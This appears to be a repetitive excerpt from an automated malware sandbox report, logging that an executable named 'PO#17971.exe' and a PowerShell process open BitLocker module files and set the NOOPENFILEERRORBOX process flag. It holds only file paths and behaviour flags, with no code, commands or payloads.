Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
